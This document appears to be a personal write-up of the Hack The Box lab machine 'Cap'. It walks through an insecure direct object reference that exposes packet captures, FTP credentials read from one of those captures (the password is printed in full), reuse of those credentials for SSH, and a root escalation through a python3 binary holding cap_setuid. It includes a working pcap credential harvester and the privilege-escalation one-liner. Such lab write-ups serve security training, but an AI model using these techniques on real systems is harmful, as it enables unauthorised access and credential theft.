
@0xEmbo

0xEmbo/Cap.md Secret

Created Aug 13, 2021

Foothold

10.10.10.245

Nmap

Not shown: 997 closed ports                                                               
PORT   STATE SERVICE VERSION                                                              
21/tcp open  ftp     vsftpd 3.0.3                                                         
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)         
80/tcp open  http    gunicorn                                           
<snip>

FTP (21)

Anonymous login not allowed.

Port 80


Port 80 serves a small web dashboard. One of its pages captures the packets between the server and my machine for 5 seconds and then offers the result as a pcap download. Notice the URL of that download, http://10.10.10.245/data/11: the capture is referenced by a plain sequential id, and nothing ties that id to the user who made it.

Changing the id to 1, http://10.10.10.245/data/1, returned an earlier capture made by someone else (which might contain FTP credentials). I downloaded that pcap and opened it, but there was nothing useful in it, so I looked at the other pages.

The next page just runs ifconfig; nothing useful here either.

Another page runs netstat, which shows the same open ports as the nmap scan; nothing useful here either.

After a moment I tried id 0 instead of 1, on the chance that the server numbers the pcap files from 0.

That was it: http://10.10.10.245/data/0 returned a different file. I downloaded it and applied the ftp display filter in Wireshark.

The filtered packets include the FTP USER and PASS commands, i.e. a username and password sent in clear text.
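The same credential harvest done without Wireshark, as an added example that is not part of the original writeup: a minimal classic-pcap parser that walks Ethernet/IPv4/TCP, pairs each FTP USER/PASS with the server's 230/530 reply, and reports only logins the server actually accepted (a capture can contain failed guesses too). The capture is constructed in memory so the script runs offline; the addresses, ports and credential strings are placeholders, not the ones from the box.

```python
"""Pull FTP logins out of a classic pcap without Wireshark.

Added example, not code from the original writeup. The capture is built
in-memory (a failed and then a successful USER/PASS exchange) so it runs
offline; addresses, ports and credentials are placeholders, not the box's.
"""
import struct

LINKTYPE_ETHERNET = 1


def _ip(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def build_tcp_frame(src, dst, sport, dport, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame with zeroed checksums (enough for a parser)."""
    eth = b"\x00" * 12 + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0, _ip(src), _ip(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 0xFFFF, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames) -> bytes:
    """Little-endian pcap: 24-byte global header, then 16-byte record headers."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = b"".join(struct.pack("<IIII", i, 0, len(f), len(f)) + f for i, f in enumerate(frames))
    return header + records


def iter_tcp_segments(pcap: bytes):
    """Yield (src_ip, dst_ip, sport, dport, payload) for every TCP segment."""
    magic = struct.unpack("<I", pcap[:4])[0]
    end = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if end is None:
        raise ValueError("not a classic pcap (pcapng needs a different parser)")
    if struct.unpack(end + "I", pcap[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only the Ethernet link type is handled here")
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(end + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue  # not IPv4 over Ethernet, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        total_len = struct.unpack("!H", frame[16:18])[0]  # ignores Ethernet padding
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:14 + total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        yield src, dst, sport, dport, tcp[(tcp[12] >> 4) * 4:]


def extract_ftp_logins(pcap: bytes, ftp_port: int = 21) -> list:
    """Pair each USER/PASS with the server reply, so only real logins are reported."""
    pending = {}  # (client_ip, client_port) -> last USER/PASS seen on that connection
    logins = []
    for src, dst, sport, dport, payload in iter_tcp_segments(pcap):
        text = payload.decode("latin-1")
        if dport == ftp_port:  # client -> server commands
            state = pending.setdefault((src, sport), {})
            for line in text.splitlines():
                verb, _, arg = line.partition(" ")
                if verb.upper() in ("USER", "PASS"):
                    state[verb.lower()] = arg
        elif sport == ftp_port:  # server -> client reply
            state = pending.get((dst, dport), {})
            if "pass" not in state:
                continue
            code = text[:3]
            if code in ("230", "530"):
                logins.append({"server": src, "user": state.get("user"),
                               "password": state.pop("pass"),
                               "status": "ok" if code == "230" else "failed"})
    return logins


# Constructed sample exchange on RFC 5737 test addresses.
CLIENT, SERVER = "192.0.2.10", "192.0.2.20"
SAMPLE_PCAP = build_pcap([
    build_tcp_frame(SERVER, CLIENT, 21, 40000, b"220 (vsFTPd 3.0.3)\r\n"),
    build_tcp_frame(CLIENT, SERVER, 40000, 21, b"USER alice\r\n"),
    build_tcp_frame(SERVER, CLIENT, 21, 40000, b"331 Please specify the password.\r\n"),
    build_tcp_frame(CLIENT, SERVER, 40000, 21, b"PASS wrong-guess\r\n"),
    build_tcp_frame(SERVER, CLIENT, 21, 40000, b"530 Login incorrect.\r\n"),
    build_tcp_frame(CLIENT, SERVER, 40000, 21, b"USER alice\r\n"),
    build_tcp_frame(SERVER, CLIENT, 21, 40000, b"331 Please specify the password.\r\n"),
    build_tcp_frame(CLIENT, SERVER, 40000, 21, b"PASS s3cret-example\r\n"),
    build_tcp_frame(SERVER, CLIENT, 21, 40000, b"230 Login successful.\r\n"),
])

if __name__ == "__main__":
    for login in extract_ftp_logins(SAMPLE_PCAP):
        print(login)
```

To run it against a downloaded capture, pass `open("0.pcap", "rb").read()` to extract_ftp_logins instead of SAMPLE_PCAP. Only the classic pcap container is handled; a pcapng file (what newer Wireshark saves by default) needs a different reader, and Wireshark's own ftp display filter or tshark remains the quicker route when a GUI is available.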

Logging in to FTP with these credentials (nathan:Buck3tH4TF0RM3!) succeeds.

Also, DON'T FORGET to try the same credentials on other services. Trying them on SSH worked as well and gave a shell as nathan.

Privilege Escalation

During enumeration I found an interesting line in /var/www/html/app.py: os.setuid(0). Switching to uid 0 normally needs root privileges, yet app.py is run by user nathan.

So the python binary must carry the cap_setuid capability, and listing file capabilities (getcap -r / 2>/dev/null) confirms it.
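The capability check behind that reasoning, as an added example that is not part of the original writeup: decode a CapEff/CapPrm mask from /proc/<pid>/status into capability names, parse getcap output in both of its formats, and flag binaries whose file capabilities hand cap_setuid to the process as an effective capability at exec (the +e part of +eip), which is exactly the condition under which os.setuid(0) succeeds for an unprivileged user. The status text and getcap lines are constructed samples with placeholder paths, not output captured from the box.

```python
"""Decode capability masks and getcap output to spot cap_setuid.

Added example, not code from the original writeup. The /proc status text and
the getcap lines below are constructed samples; paths and mask values are
placeholders, not taken from the box.
"""

# Bit numbers from include/uapi/linux/capability.h (0..40 as of kernel 5.8).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# Capabilities that let an unprivileged binary reach root more or less directly.
ROOT_EQUIVALENT = {"cap_setuid", "cap_setgid", "cap_dac_override",
                   "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace",
                   "cap_sys_module", "cap_setfcap"}


def decode_cap_mask(hex_mask: str) -> list:
    """Turn a CapEff/CapPrm-style hex mask into capability names, lowest bit first."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def caps_from_proc_status(status_text: str, field: str = "CapEff") -> list:
    """Read one Cap* field out of /proc/<pid>/status text."""
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key == field:
            return decode_cap_mask(value.strip())
    raise ValueError(f"{field} not in status text")


def parse_getcap_line(line: str):
    """Parse 'path = caps+flags' (older libcap) or 'path caps=flags' (libcap >= 2.41)."""
    path, _, rest = line.strip().partition(" ")
    rest = rest.lstrip("= ")
    for sep in ("+", "="):
        if sep in rest:
            caps, flags = rest.rsplit(sep, 1)
            return path, set(caps.split(",")), flags
    return path, set(rest.split(",")), ""


def setuid_escalation_candidates(getcap_output: str) -> list:
    """Paths whose file caps make cap_setuid effective at exec.

    The 'e' flag matters: with +ep or +eip the capability is effective as soon
    as the binary starts, so os.setuid(0) simply works. With only +p the
    process would first have to raise it into its effective set itself.
    """
    hits = []
    for line in getcap_output.splitlines():
        if not line.strip():
            continue
        path, caps, flags = parse_getcap_line(line)
        if "cap_setuid" in caps and "e" in flags:
            hits.append(path)
    return hits


# Constructed samples (placeholder paths; not captured from the box).
SAMPLE_STATUS = "Name:\tpython3\nCapPrm:\t0000000000000480\nCapEff:\t0000000000000480\n"
SAMPLE_GETCAP = (
    "/usr/bin/example-python = cap_setuid,cap_net_bind_service+eip\n"
    "/usr/bin/example-ping = cap_net_raw+ep\n"
    "/usr/bin/example-locked cap_setuid=p\n"
)

if __name__ == "__main__":
    print("effective caps:", caps_from_proc_status(SAMPLE_STATUS))
    print("setuid-capable binaries:", setuid_escalation_candidates(SAMPLE_GETCAP))
```

On a live box the inputs are `cat /proc/$$/status` for the current shell and `getcap -r / 2>/dev/null` for file capabilities; anything in ROOT_EQUIVALENT showing up on a binary an ordinary user can execute is worth a look before moving on to SUID files or sudo rules.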

Getting root

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

